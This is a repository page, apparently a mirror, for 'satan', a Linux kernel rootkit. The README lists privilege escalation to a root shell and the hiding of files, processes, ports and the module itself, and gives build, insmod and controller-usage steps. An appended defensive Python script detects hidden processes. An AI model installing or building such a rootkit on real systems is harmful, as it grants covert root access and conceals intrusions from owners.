# satan
**Repository Path**: wedojava/satan
## Basic Information
- **Project Name**: satan
- **Description**: https://github.com/aesophor/satan
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No
## Statistics
- **Stars**: 0
- **Forks**: 0
- **Created**: 2024-02-29
- **Last Updated**: 2024-08-22
## Categories & Tags
**Categories**: Uncategorized
**Tags**: None
## README
CAUTION: Do NOT test this on physical machines!
## Overview
* Local privilege escalation (grant root shell)
* File/directory hiding **by absolute path**
* Process hiding by PID
* Port hiding
* Hide the rootkit itself
* ...
## Tested On
* Debian 9 stretch 4.9.0-11
## Build Requirements
* gcc
* GNU Make
* Linux headers
## Installation
1. Build the kernel module.
```
$ git clone https://github.com/aesophor/satanic-rootkit.git
$ cd satanic-rootkit
$ make
```
2. Insert the kernel module as root.
```
root# insmod satan.ko
```
3. Run `satanist.py` as a normal user to command the rootkit.
```
$ ./satanist.py --help
```
## Usage
After inserting `satan.ko` into the Linux kernel, one can use `satanist.py` to command the rootkit.
```
> ./satanist.py --help
usage: ./satanist.py [argument]
--privesc -- Spawn a root shell (bash).
--file-hide -- File/directory hiding by absolute path.
--file-unhide -- File/directory unhiding by absolute path.
--proc-hide -- Process hiding by PID.
--proc-unhide -- Process unhiding by PID.
--port-hide -- Port hiding by port number.
--port-unhide -- Port unhiding by port number.
--mod-hide -- Module hiding (hide itself from lsmod).
--mod-unhide -- Module unhiding (unhide itself from lsmod).
-h --help -- Help message.
-v --version -- Version info.
```
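A defender's cross-view check for the process-hiding feature listed above, added here as an example and not part of the satan project: it compares the PIDs returned by listing `/proc` with the PIDs that answer a direct `/proc/<pid>/status` lookup. It assumes the hiding filters the directory listing but leaves direct lookups working, which this README does not state; `find_hidden_pids` and the other function names are hypothetical.

```python
#!/usr/bin/env python3
"""Cross-view check for PIDs that exist but are missing from a /proc listing."""
import os


def listed_pids(proc_root, lister=os.listdir):
    # View 1: what ps and top see, the numeric entries returned by listing /proc.
    return {int(name) for name in lister(proc_root) if name.isdigit()}


def is_thread_group_leader(proc_root, pid):
    # View 2: open /proc/<pid>/status directly, with no directory listing.
    # Thread IDs also resolve under /proc but are never listed, so only
    # entries whose Tgid equals their Pid count as processes.
    fields = {}
    try:
        with open(os.path.join(proc_root, str(pid), "status")) as fh:
            for line in fh:
                key, _, value = line.partition(":")
                fields[key] = value.strip()
    except OSError:
        return False  # no such PID, or it exited while being read
    return fields.get("Pid") == str(pid) and fields.get("Tgid") == str(pid)


def find_hidden_pids(proc_root="/proc", max_pid=None, lister=os.listdir):
    # Assumption: a hidden process is dropped from the listing only.
    if max_pid is None:
        with open(os.path.join(proc_root, "sys/kernel/pid_max")) as fh:
            max_pid = int(fh.read())
    before = listed_pids(proc_root, lister)
    # PIDs are always below pid_max.
    probed = {pid for pid in range(1, max_pid)
              if pid not in before and is_thread_group_leader(proc_root, pid)}
    # List again: a process that started during the scan shows up now,
    # and one that already exited fails the second probe.
    after = listed_pids(proc_root, lister)
    return sorted(pid for pid in probed - after
                  if is_thread_group_leader(proc_root, pid))


if __name__ == "__main__":
    for pid in find_hidden_pids():
        print(f"PID {pid} answers a direct lookup but is absent from the /proc listing")
```

A clean result only means this one cross-view found nothing; a module that also intercepts direct lookups would not be caught by it.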
## License
Available under [GPL-2.0 License](https://github.com/aesophor/satanic-rootkit/blob/master/LICENSE)